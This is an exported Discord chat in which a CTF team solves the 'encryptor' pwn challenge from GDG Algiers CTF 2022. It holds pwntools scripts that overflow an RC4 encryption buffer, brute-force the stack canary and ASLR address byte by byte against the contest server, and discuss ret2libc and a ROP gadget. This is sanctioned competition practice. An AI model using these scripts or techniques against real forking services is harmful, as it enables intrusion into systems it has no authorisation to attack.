Guild icon
Project Sekai
🔒 GDG Algiers CTF 2022 / ✅-pwn-encryptor
Avatar
Sutx BOT 10/07/2022 11:01 AM
encryptor - 1000 points
Category: Pwn Description: > Try Our new fast encryption algorithms implementations! Note: Docker image used for this challenge is docker.io/library/ubuntu:22.04@sha256:20fa2d7bb4de7723f542be5923b06c4d704370f0390e4ae9e1c833c8785644c1 Author: philomath213 Files:Tags: No tags.
10/07/2022 11:01 AM
Sutx pinned a message to this channel. 10/07/2022 11:01 AM
Avatar
Sutx BOT 10/07/2022 1:13 PM
@irogir wants to collaborate 🤝
Avatar
Sutx BOT 10/07/2022 1:59 PM
@TheBadGod wants to collaborate 🤝
Avatar
TheBadGod 10/07/2022 2:09 PM
from pwn import * from arc4 import ARC4 key = b"lmao" rc4 = ARC4(key) kek = rc4.decrypt(b"\x00") #r = remote("127.0.0.1", 1337) r = remote("pwn.chal.ctf.gdgalgiers.com", 1401) r.sendlineafter(b"implementation", b"2") r.sendafter(b"Key", key) r.sendafter(b"Data", kek+b"a"*100) r.interactive() leaking a bunch of stuff
14:10
nevermind
Avatar
TheBadGod 10/07/2022 2:27 PM
well the ciphertext buffer is only 256 bytes, so we have an easy stack overflow
14:27
we can leak the cookie as it's forking, so same cookie every single time
Avatar
TheBadGod 10/07/2022 2:39 PM
leaking stuff, might take some time
Avatar
TheBadGod 10/07/2022 3:36 PM
well, my script works locally to get the aslr address of the return address as well as the stack cookie, remotely i only leak 3 bytes of the cookie before it fails (aka goes into an infinite loop) from pwn import * from arc4 import ARC4 REMOTE = True key = b"mykey6" # doesn't matter rc4 = ARC4(key) if REMOTE: stack_cookie_data = b"" else: stack_cookie_data = b"" while len(stack_cookie_data) < 8: for i in range(1, 256): print(i, stack_cookie_data) if REMOTE: r = remote("pwn.chal.ctf.gdgalgiers.com", 1401) else: r = remote("127.0.0.1", 1337) r.sendlineafter(b"implementation", b"2") r.sendafter(b"Key", key) r.sendafter(b"Data", b"a"*0x108+stack_cookie_data+p8(i)) if len(r.recvall()) > 256: print("Got loads of data") stack_cookie_data += p8(i) break stack_cookie_data += b"aaaaaaaa" # rbp-0x10 stack_cookie_data += b"aaaaaaaa" # rbp-0x8 stack_cookie_data += b"aaaaaaaa" # rbp stack_cookie_data += b"" while len(stack_cookie_data) < 40: for i in range(1, 256): print(i, stack_cookie_data) if REMOTE: r = remote("pwn.chal.ctf.gdgalgiers.com", 1401) else: r = remote("127.0.0.1", 1337) r.sendlineafter(b"implementation", b"2") r.sendafter(b"Key", key) r.sendafter(b"Data", b"a"*0x108+stack_cookie_data+p8(i)) if len(r.recvall(timeout=2)) > 256: print("Got loads of data") stack_cookie_data += p8(i) break print(stack_cookie_data) rc4 = ARC4(key) leaked_data = rc4.decrypt(b"a"*0x108+stack_cookie_data)[0x108:] print(leaked_data) # extract cookie [:8], and aslr [-8:]
Avatar
TheBadGod 10/07/2022 3:43 PM
update: it broke on remote
Image attachment
Avatar
sahuang 10/07/2022 3:44 PM
lmao
Avatar
Sutx BOT 10/07/2022 6:07 PM
@Johnathan Huu Tri wants to collaborate 🤝
Avatar
Sutx BOT 10/07/2022 8:48 PM
@Zafirr wants to collaborate 🤝
Avatar
Zafirr 10/07/2022 9:03 PM
is it possible its infinite looping cause the fourth byte is null?
Avatar
Zafirr 10/07/2022 9:14 PM
yeah i think thats it
21:14
changing key might work (edited)
Avatar
Zafirr 10/07/2022 9:35 PM
yeah it works
21:38
ok i have the idea to solve this
Avatar
Zafirr 10/07/2022 9:48 PM
oh god it has a specific python version
21:48
i have to build the docker peepoo
Avatar
Avatar
Zafirr
changing key might work (edited)
TheBadGod 10/07/2022 10:08 PM
nah they fixed it 3 hours ago (according to the ticket, but well i was asleep)
Avatar
Zafirr 10/07/2022 10:09 PM
still possible that null byte was issue
Avatar
Avatar
Zafirr
ok i have the idea to solve this
TheBadGod 10/07/2022 10:09 PM
i mean ret2libc would be the easiest imo, but go ahead
Avatar
Zafirr 10/07/2022 10:09 PM
yeah just ret2libc
Avatar
Avatar
Zafirr
still possible that null byte was issue
TheBadGod 10/07/2022 10:09 PM
why do you think the key in my script is mykey6 lmao
Avatar
Zafirr 10/07/2022 10:09 PM
lmao
Avatar
Sutx BOT 10/07/2022 10:17 PM
@4n0nym4u5 wants to collaborate 🤝
22:17
@crazyman ai wants to collaborate 🤝
Avatar
Zafirr 10/07/2022 10:27 PM
im so lazy to find offset do you want to do it? @4n0nym4u5
22:27
0x7f637d8f377a
22:27
is the return address
Avatar
4n0nym4u5 10/07/2022 10:27 PM
-_- 🤣 kkkk
Avatar
Zafirr 10/07/2022 10:27 PM
thanks xD
22:28
0xc4c8bf36fb8db800
22:28
is the cookie
Avatar
4n0nym4u5 10/07/2022 10:28 PM
u ran on remote?
Avatar
Zafirr 10/07/2022 10:28 PM
yeah
Avatar
4n0nym4u5 10/07/2022 10:28 PM
ahaa
22:28
libc leak?
Avatar
Avatar
Zafirr
0x7f637d8f377a
Zafirr 10/07/2022 10:29 PM
yeah this is libc leak
22:29
well in that general area
22:29
i have no idea for the offset...
Avatar
4n0nym4u5 10/07/2022 10:29 PM
ahhh f have to find the offset?
Avatar
Zafirr 10/07/2022 10:29 PM
yeah
Avatar
4n0nym4u5 10/07/2022 10:29 PM
that will be so annoying
22:29
-_- (edited)
22:29
lmao
Avatar
Avatar
Zafirr
im so lazy to find offset do you want to do it? @4n0nym4u5
Zafirr 10/07/2022 10:29 PM
👆
22:29
xD
Avatar
4n0nym4u5 10/07/2022 10:29 PM
🤣
22:29
lets see
22:30
its too annoying so i cant guarantee it
Avatar
Zafirr 10/07/2022 10:34 PM
ill do yanc in the meantime
Avatar
Zafirr 10/07/2022 11:18 PM
did you get the offset? xD
Avatar
4n0nym4u5 10/07/2022 11:18 PM
have to go to college now
23:19
i didnt do anything
Avatar
Zafirr 10/07/2022 11:19 PM
lmao
Avatar
4n0nym4u5 10/07/2022 11:19 PM
sry
23:19
lol
Avatar
Zafirr 10/07/2022 11:19 PM
its saturday though
23:19
event?
Avatar
4n0nym4u5 10/07/2022 11:19 PM
🥲
23:19
i have entrance exams coming up
23:19
and yea we do have colleges and schools on saturdays in india.
23:19
:/
Avatar
Zafirr 10/07/2022 11:20 PM
entrance exams to where
Avatar
4n0nym4u5 10/07/2022 11:20 PM
only international schools or clgs have holidays.
Avatar
Avatar
4n0nym4u5
and yea we do have colleges and schools on saturdays in india.
Zafirr 10/07/2022 11:20 PM
wow
23:20
i only went to college on saturday if replacement class
23:20
or exams
Avatar
Avatar
Zafirr
entrance exams to where
4n0nym4u5 10/07/2022 11:20 PM
for higher studies. like to get into university according to the rank you score in the exam
23:21
im going for coaching class. its also there on sundays :/
Avatar
Zafirr 10/07/2022 11:21 PM
ah i see
23:21
good luck
Avatar
4n0nym4u5 10/07/2022 11:22 PM
i lost my hopes 😌 so idc much if i dont get a good rank now
Avatar
Avatar
Zafirr
0x7f637d8f377a
TheBadGod 10/08/2022 12:25 AM
that should point to pybind11::detail::argument_loader according to my gdb
00:25
also good morning
00:27
so that should just be aslr thingy (the lowest three nibbles could be anything which returns correctly)
Avatar
Avatar
TheBadGod
that should point to pybind11::detail::argument_loader according to my gdb
Zafirr 10/08/2022 12:48 AM
this is in the so right?
Avatar
TheBadGod 10/08/2022 12:48 AM
yes
Avatar
Zafirr 10/08/2022 12:48 AM
i think the offset from the so to libc is different
Avatar
TheBadGod 10/08/2022 12:48 AM
but there are no good gadgets and no way to print stuff :(
00:49
at least i haven't found one yet
Avatar
Zafirr 10/08/2022 12:49 AM
if there was syscall this would be easy but there isnt 😭
00:49
im bruting 3 nibbles idc anymore
Avatar
TheBadGod 10/08/2022 12:50 AM
to get libc?
Avatar
Zafirr 10/08/2022 12:50 AM
yeah
Avatar
TheBadGod 10/08/2022 12:51 AM
wait, we can probably just return pybytes, maybe
Avatar
TheBadGod 10/08/2022 2:00 AM
any luck so far?
Avatar
Zafirr 10/08/2022 2:00 AM
nope
Avatar
TheBadGod 10/08/2022 2:00 AM
same :(
Avatar
Sutx BOT 10/08/2022 2:05 AM
@Violin wants to collaborate 🤝
Avatar
Sutx BOT 10/08/2022 5:55 AM
@22sh wants to collaborate 🤝
05:56
@22sh left you alone, what a chicken! 🐥
Avatar
Sutx BOT 10/08/2022 7:56 AM
@Piers wants to collaborate 🤝
Avatar
Piers 10/08/2022 11:14 AM
damn the longer the payload the harder it is to avoid null byte 😦
Avatar
Zafirr 10/08/2022 11:14 AM
just change the key
Avatar
Piers 10/08/2022 11:14 AM
yeah im typing random key
11:14
but no luck yet
Avatar
Zafirr 10/08/2022 11:14 AM
wtf
11:14
how long is your payload
Avatar
Piers 10/08/2022 11:15 AM
0x230 bytes 🥲
11:15
maybe i should just try reverse shell instead of open read write
11:21
would someone bruteforce the remote cookie and aslr please
11:21
my network is terrible
Avatar
sahuang 10/08/2022 11:22 AM
you got a script or sth? i can run it for you if possible
Avatar
Piers 10/08/2022 11:22 AM
give me a few minutes
11:23
but you can use the bad god script to leak
Avatar
Piers 10/08/2022 11:31 AM
from pwn import * from arc4 import ARC4 REMOTE = True key = b"mykey6892y398ey19823791251283712312" def enc(k,data): r.sendlineafter(b"implementation", b"2") r.sendafter(b"Key", k) r.sendafter(b"Data", data) if REMOTE: stack_cookie_data = b"" else: stack_cookie_data = b"" while len(stack_cookie_data) < 8: for i in range(1, 256): print(i, stack_cookie_data) if REMOTE: r = remote("pwn.chal.ctf.gdgalgiers.com", 1401) else: r = remote("127.0.0.1", 1337) r.sendlineafter(b"implementation", b"2") r.sendafter(b"Key", key) r.sendafter(b"Data", b"a"*0x108+stack_cookie_data+p8(i)) if len(r.recvall()) > 256: print("Got loads of data") stack_cookie_data += p8(i) break stack_cookie_data += b"aaaaaaaa" # rbp-0x10 stack_cookie_data += b"aaaaaaaa" # rbp-0x8 stack_cookie_data += b"aaaaaaaa" # rbp stack_cookie_data += b"" while len(stack_cookie_data) < 40: for i in range(1, 256): print(i, stack_cookie_data) if REMOTE: r = remote("pwn.chal.ctf.gdgalgiers.com", 1401) else: r = remote("127.0.0.1", 1337) r.sendlineafter(b"implementation", b"2") r.sendafter(b"Key", key) r.sendafter(b"Data", b"a"*0x108+stack_cookie_data+p8(i)) if len(r.recvall(timeout=2)) > 256: print("Got loads of data") stack_cookie_data += p8(i) break print(stack_cookie_data) rc4 = ARC4(key) leaked_data = rc4.decrypt(b"a"*0x108+stack_cookie_data)[0x108:] cookie = int.from_bytes(leaked_data[:8],byteorder='little') aslr = int.from_bytes(leaked_data[-8:],byteorder='little')
11:31
heres mybadgod script
11:31
i need the remote cookie and aslr
Avatar
sahuang 10/08/2022 11:31 AM
do i need any modification or just run it
Avatar
Piers 10/08/2022 11:31 AM
add this at the end i guess
11:31
log.info("COOKIE: " + hex(cookie)) log.info("ASLR ENCRYPTOR: " + hex(aslr)) (edited)
11:32
and pip install arc4
Avatar
sahuang 10/08/2022 11:33 AM
ok running it
11:33
how long it takes around?
Avatar
Piers 10/08/2022 11:33 AM
idk depends on the network
11:33
mine was very slow (edited)
11:34
hopefully 15-20 mins
Avatar
sahuang 10/08/2022 11:34 AM
24 b'\x15'
11:34
sth like this?>
Avatar
Piers 10/08/2022 11:34 AM
yeah
Avatar
sahuang 10/08/2022 11:34 AM
ok
Avatar
Piers 10/08/2022 11:34 AM
at the end there should be log info
Avatar
sahuang 10/08/2022 11:34 AM
how many bytes?
11:34
it seems fast
11:34
got 2 bytes alr
Avatar
Piers 10/08/2022 11:34 AM
14
Avatar
sahuang 10/08/2022 11:34 AM
ah ok
11:34
should be in 10min
Avatar
Piers 10/08/2022 11:35 AM
ah 16
11:35
yeah shouldnt be too long (edited)
Avatar
sahuang 10/08/2022 11:56 AM
hmm
11:56
178 b'\x15%\xa5\x01\x83\xf7\x07' [+] Opening connection to pwn.chal.ctf.gdgalgiers.com on port 1401: Done [+] Receiving all data: Done (282B) [*] Closed connection to pwn.chal.ctf.gdgalgiers.com port 1401 Got loads of data 1 b'\x15%\xa5\x01\x83\xf7\x07\xb2aaaaaaaaaaaaaaaaaaaaaaaa'
11:56
what
Avatar
Piers 10/08/2022 11:56 AM
yeah its working as intended
Avatar
TheBadGod 10/08/2022 11:57 AM
first 8 bytes leaked will be the stack cookie last 8 bytes will be aslr + 0x3377a
11:57
aslr of the encryptor .so, not libc
Avatar
sahuang 10/08/2022 11:57 AM
ah ok yeah its now leaking backwards
Avatar
TheBadGod 10/08/2022 11:58 AM
also this is the encrytped data, so the actual cookie is different and you'd need to decrypt it
Avatar
Piers 10/08/2022 11:58 AM
i copied your script, it handles that as well
Avatar
TheBadGod 10/08/2022 12:01 PM
yeah, but if you want it in the middle somewhere
Avatar
sahuang 10/08/2022 12:18 PM
should be done in 5min
12:18
slower than i thought
Avatar
TheBadGod 10/08/2022 12:19 PM
wait, are you leaking the values?
12:19
i mean we have those, no?
Avatar
sahuang 10/08/2022 12:20 PM
really? idk, Piers asked me to run it to brute the values
Avatar
Avatar
Zafirr
0xc4c8bf36fb8db800
TheBadGod 10/08/2022 12:20 PM
idk, last time i checked they didn't change from this
12:20
(cookie)
Avatar
Avatar
Zafirr
0x7f637d8f377a
TheBadGod 10/08/2022 12:20 PM
and this as aslr, so 0x7f637d8c0000 as base address for the so
Avatar
Piers 10/08/2022 12:21 PM
i thought they changed it
Avatar
TheBadGod 10/08/2022 12:21 PM
ah
Avatar
Piers 10/08/2022 12:21 PM
after leaking first byte it took too long
Avatar
TheBadGod 10/08/2022 12:22 PM
well, then carry on with bruting lol
Avatar
Piers 10/08/2022 12:22 PM
im not sure really
12:22
maybe it hasnt changed xd
Avatar
sahuang 10/08/2022 12:25 PM
[*] COOKIE: 0xc4c8bf36fb8db800 [*] ASLR ENCRYPTOR: 0x7f637d8f377a (edited)
Avatar
Piers 10/08/2022 12:25 PM
lol the same xd
12:25
should have tried them first
Avatar
Avatar
Piers
used /ctf solve
Sutx BOT 10/08/2022 12:30 PM
✅ Challenge solved.
Avatar
TheBadGod 10/08/2022 12:30 PM
nice
thanks 1
Avatar
sahuang 10/08/2022 12:30 PM
gj
Avatar
Zafirr 10/08/2022 9:16 PM
how did you get libc offset? @Piers
Avatar
Piers 10/08/2022 9:38 PM
i used add [rbp-0x3d], ebx
21:38
if anonymouse does this he probably can solve it lol
Avatar
Zafirr 10/08/2022 9:38 PM
oh
21:38
so used the got in the so?
21:39
theres a libc address there
Avatar
Piers 10/08/2022 9:39 PM
yeah
Avatar
Zafirr 10/08/2022 9:39 PM
i didnt check xD
21:39
ok2
Avatar
Avatar
Piers
i used add [rbp-0x3d], ebx
4n0nym4u5 10/09/2022 6:26 AM
😂😂 haha nice
Exported 174 message(s)